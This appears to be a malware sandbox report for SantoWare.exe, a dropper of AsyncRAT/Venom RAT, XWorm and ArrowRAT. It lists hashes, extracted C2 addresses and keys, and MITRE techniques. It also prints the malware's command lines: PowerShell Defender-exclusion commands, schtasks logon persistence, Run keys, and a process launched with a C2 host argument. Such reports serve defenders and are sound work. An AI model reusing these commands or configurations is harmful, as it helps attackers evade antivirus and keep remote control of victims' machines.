Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
136s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/12/2024, 18:21
Static task
static1
Behavioral task
behavioral1
Sample
SantoWare.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
SantoWare.exe
Resource
win10v2004-20241007-en
General
-
Target
SantoWare.exe
-
Size
8.1MB
-
MD5
9146e533d8cdfdfd620e221d6b0c8fb0
-
SHA1
0e2e6ae26b93d62bc6e439b98ab278fd9f877c22
-
SHA256
164cf475b4a37a4c142125bdc1808f4bc5f0f8f1efa555c65609b83b1704a7b9
-
SHA512
a73bd811f10dee9035eb075ef4487c21c5de231e725311d3638655cc723681cf419f5d0bbcc4e0557bd6e2d3e71c52fedfe5bbde8ca09a62728249132fa23d59
-
SSDEEP
196608:S8HXVmgfjPEbX2bVj180+qWc67W21Jn2khSs50CG11:S8HXY+zEz2JZ80jv6b1JjEAGv
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
147.185.221.24:18891
ojozazfbghcdrrcaa
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
xworm
5.0
ma-compile.gl.at.ply.gg:18894
RJpwA4Zvno655gyq
-
install_file
USB.exe
Extracted
arrowrat
DiscordCClient
know-england.gl.at.ply.gg:18903
vlCHETDFA
Signatures
-
Arrowrat family
-
Asyncrat family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/memory/2644-30-0x0000000000930000-0x0000000000940000-memory.dmp family_xworm behavioral1/files/0x000a0000000120f1-28.dat family_xworm -
resource yara_rule behavioral1/files/0x00120000000054a9-13.dat VenomRAT behavioral1/memory/2912-15-0x0000000000150000-0x0000000000168000-memory.dmp VenomRAT -
Venomrat family
-
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x00120000000054a9-13.dat family_asyncrat -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2796 powershell.exe 328 powershell.exe 1312 powershell.exe 2396 powershell.exe 2764 powershell.exe 2688 powershell.exe -
Executes dropped EXE 5 IoCs
pid Process 2912 DiscordVcClient.exe 2644 DiscordXClient.exe 2444 Client.exe 3068 Built.exe 2588 Built.exe -
Loads dropped DLL 9 IoCs
pid Process 2408 SantoWare.exe 2588 Built.exe 2588 Built.exe 2588 Built.exe 2588 Built.exe 2588 Built.exe 2588 Built.exe 2588 Built.exe 1196 Process not Found -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\DiscordVcClient = "C:\\Windows\\System32\\DiscordVcClient.exe" SantoWare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\DiscordXClient = "C:\\Windows\\System32\\DiscordXClient.exe" SantoWare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client = "C:\\Windows\\System32\\Client.exe" SantoWare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\Built = "C:\\Windows\\System32\\Built.exe" SantoWare.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File created C:\Windows\System32\DiscordVcClient.exe SantoWare.exe File opened for modification C:\Windows\System32\DiscordVcClient.exe SantoWare.exe File created C:\Windows\System32\DiscordXClient.exe SantoWare.exe File opened for modification C:\Windows\System32\DiscordXClient.exe SantoWare.exe File created C:\Windows\System32\Client.exe SantoWare.exe File opened for modification C:\Windows\System32\Client.exe SantoWare.exe File created C:\Windows\System32\Built.exe SantoWare.exe File opened for modification C:\Windows\System32\Built.exe SantoWare.exe -
resource yara_rule behavioral1/files/0x000500000001a466-129.dat upx behavioral1/memory/2588-131-0x000007FEF2120000-0x000007FEF270E000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 5 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3028 schtasks.exe 2564 schtasks.exe 2860 schtasks.exe 2892 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2396 powershell.exe 2764 powershell.exe 2688 powershell.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2796 powershell.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2444 Client.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 328 powershell.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe 2912 DiscordVcClient.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeDebugPrivilege 2912 DiscordVcClient.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 2444 Client.exe Token: SeDebugPrivilege 2796 powershell.exe Token: SeShutdownPrivilege 2980 explorer.exe Token: SeShutdownPrivilege 2980 explorer.exe Token: SeShutdownPrivilege 2980 explorer.exe Token: SeShutdownPrivilege 2980 explorer.exe Token: SeShutdownPrivilege 2980 explorer.exe Token: SeShutdownPrivilege 2980 explorer.exe Token: SeShutdownPrivilege 2980 explorer.exe Token: SeShutdownPrivilege 2980 explorer.exe Token: SeDebugPrivilege 2644 DiscordXClient.exe Token: SeDebugPrivilege 328 powershell.exe Token: SeDebugPrivilege 1312 powershell.exe Token: SeDebugPrivilege 2644 DiscordXClient.exe Token: SeShutdownPrivilege 2980 explorer.exe Token: SeShutdownPrivilege 2980 explorer.exe Token: SeShutdownPrivilege 2980 explorer.exe Token: SeShutdownPrivilege 2980 explorer.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe 2980 explorer.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2444 Client.exe 2912 DiscordVcClient.exe 2644 DiscordXClient.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2408 wrote to memory of 2396 2408 SantoWare.exe 30 PID 2408 wrote to memory of 2396 2408 SantoWare.exe 30 PID 2408 wrote to memory of 2396 2408 SantoWare.exe 30 PID 2408 wrote to memory of 2860 2408 SantoWare.exe 32 PID 2408 wrote to memory of 2860 2408 SantoWare.exe 32 PID 2408 wrote to memory of 2860 2408 SantoWare.exe 32 PID 2408 wrote to memory of 2912 2408 SantoWare.exe 34 PID 2408 wrote to memory of 2912 2408 SantoWare.exe 34 PID 2408 wrote to memory of 2912 2408 SantoWare.exe 34 PID 2408 wrote to memory of 2764 2408 SantoWare.exe 35 PID 2408 wrote to memory of 2764 2408 SantoWare.exe 35 PID 2408 wrote to memory of 2764 2408 SantoWare.exe 35 PID 2408 wrote to memory of 2892 2408 SantoWare.exe 37 PID 2408 wrote to memory of 2892 2408 SantoWare.exe 37 PID 2408 wrote to memory of 2892 2408 SantoWare.exe 37 PID 2408 wrote to memory of 2644 2408 SantoWare.exe 39 PID 2408 wrote to memory of 2644 2408 SantoWare.exe 39 PID 2408 wrote to memory of 2644 2408 SantoWare.exe 39 PID 2408 wrote to memory of 2688 2408 SantoWare.exe 40 PID 2408 wrote to memory of 2688 2408 SantoWare.exe 40 PID 2408 wrote to memory of 2688 2408 SantoWare.exe 40 PID 2408 wrote to memory of 3028 2408 SantoWare.exe 42 PID 2408 wrote to memory of 3028 2408 SantoWare.exe 42 PID 2408 wrote to memory of 3028 2408 SantoWare.exe 42 PID 2408 wrote to memory of 2444 2408 SantoWare.exe 44 PID 2408 wrote to memory of 2444 2408 SantoWare.exe 44 PID 2408 wrote to memory of 2444 2408 SantoWare.exe 44 PID 2408 wrote to memory of 2796 2408 SantoWare.exe 45 PID 2408 wrote to memory of 2796 2408 SantoWare.exe 45 PID 2408 wrote to memory of 2796 2408 SantoWare.exe 45 PID 2444 wrote to memory of 2980 2444 Client.exe 47 PID 2444 wrote to memory of 2980 2444 Client.exe 47 PID 2444 wrote to memory of 2980 2444 Client.exe 47 PID 2444 wrote to memory of 2968 2444 Client.exe 48 PID 2444 wrote to memory of 2968 2444 Client.exe 48 PID 2444 wrote to memory of 2968 2444 Client.exe 48 PID 2444 wrote to memory of 2968 2444 Client.exe 48 PID 2444 wrote to memory of 3020 2444 Client.exe 49 PID 2444 wrote to memory of 3020 2444 Client.exe 49 PID 2444 wrote to memory of 3020 2444 Client.exe 49 PID 2444 wrote to memory of 3020 2444 Client.exe 49 PID 2444 wrote to memory of 1676 2444 Client.exe 50 PID 2444 wrote to memory of 1676 2444 Client.exe 50 PID 2444 wrote to memory of 1676 2444 Client.exe 50 PID 2444 wrote to memory of 1676 2444 Client.exe 50 PID 2444 wrote to memory of 1864 2444 Client.exe 51 PID 2444 wrote to memory of 1864 2444 Client.exe 51 PID 2444 wrote to memory of 1864 2444 Client.exe 51 PID 2444 wrote to memory of 1864 2444 Client.exe 51 PID 2444 wrote to memory of 2700 2444 Client.exe 52 PID 2444 wrote to memory of 2700 2444 Client.exe 52 PID 2444 wrote to memory of 2700 2444 Client.exe 52 PID 2444 wrote to memory of 2700 2444 Client.exe 52 PID 2444 wrote to memory of 1736 2444 Client.exe 53 PID 2444 wrote to memory of 1736 2444 Client.exe 53 PID 2444 wrote to memory of 1736 2444 Client.exe 53 PID 2444 wrote to memory of 1736 2444 Client.exe 53 PID 2444 wrote to memory of 1056 2444 Client.exe 54 PID 2444 wrote to memory of 1056 2444 Client.exe 54 PID 2444 wrote to memory of 1056 2444 Client.exe 54 PID 2444 wrote to memory of 1056 2444 Client.exe 54 PID 2444 wrote to memory of 1600 2444 Client.exe 55 PID 2444 wrote to memory of 1600 2444 Client.exe 55 PID 2444 wrote to memory of 1600 2444 Client.exe 55 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\SantoWare.exe"C:\Users\Admin\AppData\Local\Temp\SantoWare.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\DiscordVcClient.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "DiscordVcClient" /SC ONLOGON /TR "C:\Windows\System32\DiscordVcClient.exe" /RL HIGHEST2⤵
- Scheduled Task/Job: Scheduled Task
PID:2860
-
-
C:\Windows\System32\DiscordVcClient.exe"C:\Windows\System32\DiscordVcClient.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\DiscordXClient.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "DiscordXClient" /SC ONLOGON /TR "C:\Windows\System32\DiscordXClient.exe" /RL HIGHEST2⤵
- Scheduled Task/Job: Scheduled Task
PID:2892
-
-
C:\Windows\System32\DiscordXClient.exe"C:\Windows\System32\DiscordXClient.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2644 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\DiscordXClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DiscordXClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Client.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Client" /SC ONLOGON /TR "C:\Windows\System32\Client.exe" /RL HIGHEST2⤵
- Scheduled Task/Job: Scheduled Task
PID:3028
-
-
C:\Windows\System32\Client.exe"C:\Windows\System32\Client.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2980 -
C:\Windows\system32\ctfmon.exectfmon.exe4⤵PID:2080
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA3⤵PID:2968
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA3⤵PID:3020
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA3⤵PID:1676
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA3⤵PID:1864
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA3⤵PID:2700
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA3⤵PID:1736
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA3⤵PID:1056
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA3⤵PID:1600
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA3⤵PID:1656
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" DiscordCClient know-england.gl.at.ply.gg 18903 vlCHETDFA3⤵PID:844
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2444 -s 6643⤵PID:2328
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Built" /SC ONLOGON /TR "C:\Windows\System32\Built.exe" /RL HIGHEST2⤵
- Scheduled Task/Job: Scheduled Task
PID:2564
-
-
C:\Windows\System32\Built.exe"C:\Windows\System32\Built.exe"2⤵
- Executes dropped EXE
PID:3068 -
C:\Windows\System32\Built.exe"C:\Windows\System32\Built.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2588
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
21KB
MD51c58526d681efe507deb8f1935c75487
SHA10e6d328faf3563f2aae029bc5f2272fb7a742672
SHA256ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2
SHA5128edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1
-
Filesize
18KB
MD5bfffa7117fd9b1622c66d949bac3f1d7
SHA1402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2
SHA2561ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e
SHA512b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f
-
Filesize
1.6MB
MD576eb1ad615ba6600ce747bf1acde6679
SHA1d3e1318077217372653be3947635b93df68156a4
SHA25630be871735591ad96bc3fc7e541cdef474366159c2f7443feb30739cbd2db7e1
SHA5122b960e74dd73f61d6a44fef0de9f2d50bcf2ec856b7aa5b97f0107e3cdadea461790760668a67db2ecaf71ff323133ee39ce2b38aafff3629c14e736d6a64aeb
-
Filesize
992KB
MD50e0bac3d1dcc1833eae4e3e4cf83c4ef
SHA14189f4459c54e69c6d3155a82524bda7549a75a6
SHA2568a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae
SHA512a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b1efc2c5878fb1229878ad5369c28b17
SHA10625070b13ca7c197f07b586f20dda99e8b3e5a0
SHA25651c00a3dec3765e2bef4bddbab0825c2b21fb1c985b114a3a697482fb6d2c2f8
SHA512d95b17d362e3d9b37b27d9574293066a7ae92547a5bf54598189f695589ef7436c078be26205929dd9fcdefe512afef4990e743bbe45e083756b33de66413b0d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5fca1fadff469090f8771e17fff94d6b9
SHA1bc4191236f2b1b06da03222c0756f11c93148525
SHA2563d8c90d1e3a0748eae7989ea3424e457c24fe37b06a9ea45615d41b19f6e9875
SHA51291e2a79569dc981b95c93eeafb1427df3828ea8457ac73bebf519718e2e19ea099aa2e74e0892d377d193f7c93ac24d193523204f3b61655a9bfd1bd4fb9cea0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9JY41S7LYTYBT12FSL6O.temp
Filesize7KB
MD58eda4477a7925a1c5fd519ecc0657e2a
SHA18b41b9ed506017b08ecc642f36c2bedb3941cba7
SHA25656f659f4340849d2ccfd121217ff20ace0abdaea2f152fcd069932db2f5d7e5e
SHA5124239be7faad4167a3a35afe08fca0554f88fb6b0d22d9948beca198bcc973eb6387f43b6e88cb35c29cf0857938fc61b4f3f4e1b2dc1ef4475fcf30f83e47c0c
-
Filesize
158KB
MD599824baab1676a2ed1e898090cb0fcc1
SHA1951617c54e68a221da776add3264450f8a2255cb
SHA256a88efa6dea3c898d55f882ce0143518b9da2883496e5fc448c791f328d13e82d
SHA512218c5a899b063ccae1ac02d3e8abe9b6e3d307573c0363d01e1bb3626ce090aaa08a2a7cec33cfce6abd115dc39964048d1dc8320fd143af9ef651d92edc072a
-
Filesize
74KB
MD5d6adfa25699c74bc456c1b255fea81df
SHA1fc9e822263308909409a8429004ad4a2249124ff
SHA256a34d9f25edb98b2cf95879380b52c59d857c22929b327f2b1cac64ab86beb2c5
SHA512ae987008e8f39bc489373d602a79e91321603c400fa3ba982fc99af1baf2461bfeab5bed5c1b26f06f5bf328a565a89187c0b310d5bc69228d5191d36313bcfd
-
Filesize
37KB
MD5582bba7b8005d6c324b945a19e6d6c16
SHA19a8f6c7fa7bb46689e6d146e1b070c70ec14c36f
SHA256671866f3a944ee4f0419d188539a85e43742e04fbde5131b51848fad44e2719c
SHA5120616d371f8d4ed2ff64077fcd8f49c7abec432fe3e3d8bbf84cba82c631a009a9acdba69a54135bb0b672c1fa9afcec165b1caab23c1fdd79a555acc893e04d3
-
Filesize
21KB
MD5724223109e49cb01d61d63a8be926b8f
SHA1072a4d01e01dbbab7281d9bd3add76f9a3c8b23b
SHA2564e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210
SHA51219b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c
-
Filesize
21KB
MD5517eb9e2cb671ae49f99173d7f7ce43f
SHA14ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab
SHA25657cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54
SHA512492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be
-
Filesize
21KB
MD5d12403ee11359259ba2b0706e5e5111c
SHA103cc7827a30fd1dee38665c0cc993b4b533ac138
SHA256f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781
SHA5129004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0
-
Filesize
8.1MB
MD589dd023a703e12d4e2a4686d02abe286
SHA19681f55084c7c292acfe26a979f8e04d80efc1ff
SHA256d008401e82c6dba813720416672a6dde33dd214438ed389fc08fdbead3540ed4
SHA512a8f20e05603d0aaba36c5cb856c4ffc0f93ffc9685919638961ae0305f097bfe7d913bc7b283378e93cc9ae7a3edb678b98d0a6645638f7e858984d26a3c6197